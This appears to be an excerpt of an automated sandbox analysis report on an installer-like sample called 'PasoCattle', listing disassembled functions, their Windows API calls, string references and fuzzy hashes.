Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

M, xrefs: 00404B6F
@, xrefs: 00404BBC
N, xrefs: 00404C32
, xrefs: 00404F65

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
\*.*, xrefs: 00406D2F
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
ptF, xrefs: 00406D1A
Delete: DeleteFile failed("%s"), xrefs: 00406E29
Delete: DeleteFile("%s"), xrefs: 00406DE8
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

F, xrefs: 004046A0
A, xrefs: 00404662

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

